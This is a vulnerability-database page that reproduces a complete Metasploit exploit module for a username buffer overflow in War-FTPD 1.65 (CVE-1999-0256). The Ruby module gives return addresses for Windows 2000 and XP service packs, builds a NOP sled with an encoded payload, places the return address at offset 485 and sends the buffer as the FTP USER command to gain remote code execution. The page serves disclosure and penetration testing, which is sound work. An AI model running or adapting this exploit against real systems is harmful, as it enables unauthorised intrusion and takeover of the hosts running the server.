Lucene search

War-FTPD 1.65 Username Overflow

🗓️ 08 Jan 2006 14:59:27Reported by Fairuzan Roslan <[email protected]>Type

War-FTPD 1.65 Username Overflow module exploits buffer overflow in USER comman

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 15
Metasploit	War-FTPD 1.65 Password Overflow	13 Dec 200605:46	–	metasploit
OpenVAS	War FTP Daemon USER/PASS Overflow	3 Nov 200500:00	–	openvas
OpenVAS	War FTP Daemon USER/PASS Overflow	3 Nov 200500:00	–	openvas
Cvelist	CVE-1999-0256	29 Sep 199904:00	–	cvelist
Cvelist	CVE-2007-1567	21 Mar 200721:00	–	cvelist
NVD	CVE-1999-0256	1 Feb 199805:00	–	nvd
NVD	CVE-2007-1567	21 Mar 200721:19	–	nvd
Tenable Nessus	WarFTPd USER/PASS Command Remote Overflow	22 Jan 200300:00	–	nessus
Packet Storm	War-FTPD 1.65 Password Overflow	26 Nov 200900:00	–	packetstorm
Packet Storm	War-FTPD 1.65 Username Overflow	30 Oct 200900:00	–	packetstorm

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'War-FTPD 1.65 Username Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow found in the USER command
        of War-FTPD 1.65.
      },
      'Author'         => 'Fairuzan Roslan <riaf[at]mysec.org>',
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '1999-0256'],
          [ 'OSVDB', '875'    ],
          [ 'BID', '10078'	]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'    => 424,
          'BadChars' => "\x00\x0a\x0d\x40",
          'StackAdjustment' => -3500,
          'Compat'   =>
            {
              'ConnectionType' => "-find"
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Target 0
          [
            'Windows 2000 SP0-SP4 English',
            {
              'Ret'      => 0x750231e2 # ws2help.dll
            },
          ],
          # Target 1
          [
            'Windows XP SP0-SP1 English',
            {
              'Ret'      => 0x71ab1d54 # push esp, ret
            }
          ],
          # Target 2
          [
            'Windows XP SP2 English',
            {
              'Ret'      => 0x71ab9372 # push esp, ret
            }
          ],
          # Target 3
          [
            'Windows XP SP3 English',
            {
              'Ret'      => 0x71ab2b53 # push esp, ret
            }
          ]
        ],
      'DisclosureDate' => '1998-03-19'))
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    buf          = make_nops(600) + payload.encoded
    buf[485, 4]  = [ target.ret ].pack('V')

    send_cmd( ['USER', buf] , false )

    handler
    disconnect
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

08 Jan 2006 14:27Current

0.2Low risk

Vulners AI Score0.2

CVSS27.5

EPSS0.80651